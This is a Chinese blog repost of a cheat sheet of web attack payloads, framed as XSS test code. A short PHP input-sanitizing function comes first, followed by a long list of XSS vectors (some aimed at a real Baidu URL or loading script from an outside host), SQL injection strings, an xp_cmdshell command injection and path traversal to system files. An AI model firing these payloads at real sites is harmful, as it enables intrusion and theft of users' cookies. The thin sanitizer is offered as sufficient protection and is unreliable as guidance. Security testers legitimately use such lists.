XSS跨站测试代码大全,及处理

最新推荐文章于 2023-08-06 22:18:53 发布
最新推荐文章于 2023-08-06 22:18:53 发布
阅读量404 收藏
点赞数
文章标签: javascript php java ViewUI
原文链接:http://www.cnblogs.com/seanxyh/archive/2013/04/03/2998637.html
版权

//跨站解决方式,处理所有用户输入【intval(),  format_param()】
处理:对用户输入参数进行处理
//防注入函数

 

function clear_gpc($var){
    if (get_magic_quotes_gpc())   {
        $var = htmlspecialchars(trim($var));
    }else{
        $var = htmlspecialchars(addslashes(trim($var)));
    }
    return $var;
}

 

 http://my.baidu.com/reg/?city=%22%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://my.baidu.com/reg/?city=%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
city=""><script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG src="javascript:alert('XSS');">
<IMG src=javascript:alert('XSS')>
<IMG src=JaVaScRiPt:alert('XSS')>
<IMG src=JaVaScRiPt:alert("XSS")>
<IMG src=javascript:alert('XSS')>
<IMG src=javascript:alert('XSS')>
<IMG   src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
<IMG src="jav ascript:alert('XSS');">
"<IMG src=java\0script:alert(\"XSS\")>";' > out
<IMG src=" javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND src="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" href="javascript:alert('XSS');">
<IMG src='vbscript:msgbox("XSS")'>
<IMG src="mocha:[code]">
<IMG src="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME src=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE href="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML src="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG src="javascript:alert('XSS')"
<!--#exec  cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo  '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a[/code]

 

 

转载于:https://www.cnblogs.com/seanxyh/archive/2013/04/03/2998637.html

weixin_30603633
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
XSS跨站脚本攻击(基础详解)
cike_y
01-10 1702
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
XSS 攻击常用代码
高压锅博客
12-22 6898
【代码】XSS 攻击常用代码。
XSS测试代码大全
热门推荐
夕慕慕的博客
11-14 1万+
XSS测试代码大全 主要根据各种脚本及标签,将之转换成Unicode编码后输入。 '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a
XSS(跨站脚本攻击) - 常用代码大全
qq_28004653的博客
07-06 1617
1’"()&% <svg/οnlοad=alert(1)> '> =’> %3Cscript%3Ealert(‘XSS’)%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/wi
WEB安全测试
07-02
11.10 测试跨站请求伪造 249 第12章 多层面的测试 251 12.1 使用XSS窃取Cookie 251 12.2 使用XSS创建覆盖 253 12.3 使用XSS产生HTTP请求 255 12.4 以交互方式尝试基于DOM的XSS 256 12.5 绕过字段长度限制(XSS) ...
[完整][中文][WEB安全测试].(美)霍普.扫描版.pdf
12-07
在本书的最后,你将能够建立精确定位到Ajax函数的测试,以及适用于常见怀疑对象(跨站式脚本和注入攻击)的大型多级测试。  本书将帮助你:  ·获取、安装和配置有用的——且免费的——安全测试工具  ·理解你的...
owasp靶机视频.zip
10-14
OWASP靶机教学视频,其中包括访问控制缺、陷阿贾克斯安全、身份验证缺陷、缓冲溢出、代码质量、并发跨站点脚本 (XSS)、错误处理不当、注射缺陷、拒绝服务、不安全的沟通、不安全配置、不安全存储、恶意执行参数、...
Web安全深度剖析(张柄帅)
07-25
第7章 XSS跨站脚本漏洞 129 7.1 XSS原理解析 129 7.2 XSS类型 130 7.2.1 反射型XSS 130 7.2.2 存储型XSS 131 7.2.3 DOM XSS 132 7.3 检测XSS 133 7.3.1 手工检测XSS 134 7.3.2 全自动检测XSS 134 7.4 XSS高级利用 ...
白帽子讲浏览器安全.钱文祥(带详细书签).pdf
03-08
7.4 更为复杂的代码处理:对Angler网马工具包的反混淆 170 7.4.1 Angler EK的特征 170 7.4.2 推理:找出代码中的“解密-执行”模式 172 7.4.3 检证:确定“解密-执行”模式的位置和方法 175 7.4.4 追踪:使用...
白帽子讲Web安全 第三章 跨站脚本攻击(XSS
weixin_30419799的博客
10-25 252
XSS----Cross Site Script; XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 1、XSS根据效果划分三类: 1)反射型XSS(非持久型XSS):简单的把用户输入的数据“反射”给浏览器。黑客往往需要诱导用户点击一个恶意链接,才能攻击成功。 2)存储型XSS(持久型XSS):存储型会把用户输入...
跨站脚本攻击XSS
stsfang
06-30 209
跨站脚本攻击,一般是指黑客通过HTML注入攻击篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS攻击的三种类型 反射型XSS 反射型XSS只是简单地把用户输入的数据反射给浏览器,也就是说,黑客往往需要诱导用户“点击”一个恶意链接,才能攻击成功。反射型XSS也叫“非持久型XSS” 存储型XSS 存储型XSS会把用户输入的数据“存储”在服务器端,这种XSS...
常用xss代码以及绕过
csviking的博客
11-18 7580
常规xss的代码 "OnMoUsEoVeR=prompt(1)// #一般用于表单框插入比较好 "-prompt(1)-" # URL删除参数,列如id=1 xss添加为id="-prompt(1)-"
XSS攻击及防御
king_jw的专栏
06-30 500
XSS又称CSS,全称Cross SiteScript跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。XSS攻击XSS攻击类似于SQL注入攻击,
Web安全漏洞——XSS攻击
weixin_42095265的博客
11-20 362
1.原理 Xss跨站脚本攻击),英文名“Cross Site Sripting”,在一开始,这种攻击的案列是跨域(同源策略)的,所以叫做“跨站脚本”,但是今天,由于js的强大功能以及网站前端的复杂性,是否跨域已经不再重要。Xss也是注入攻击,即本质是把用户输入的数据当成代码执行。当web应用对用户输入过滤不严格,攻击者写入恶意的脚本代码(html、js)到网页中时,如果用户访问了带有恶意代码的页...
XSS漏洞的小合集
一醉一休的博客
03-03 5226
一.XSS盲打 二.关于htmlspecialchars()函数 三.通过XSS结合钓鱼原理
Pikachu靶场XSS跨站脚本)演示(含代码审计)
最新发布
G6_12的博客
08-06 227
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS
xss(跨站攻击)
m0_74456293的博客
03-20 2307
xss跨站攻击)
一些经典的XSS跨站代码整理
主题模板站的博客
01-31 405
base64,>>有趣的isindex 興味深いhttp://jsbin.com/inekab for Opera only。IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
测试人员如何测试XSS跨站脚本攻击
07-08
测试人员可以采取以下步骤来测试应用程序中的 XSS跨站脚本攻击)风险: 1. 理解应用程序:首先,测试人员需要充分了解应用程序的功能、数据流和相关的输入输出点。这有助于确定哪些输入点可能存在 XSS 的潜在风险...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值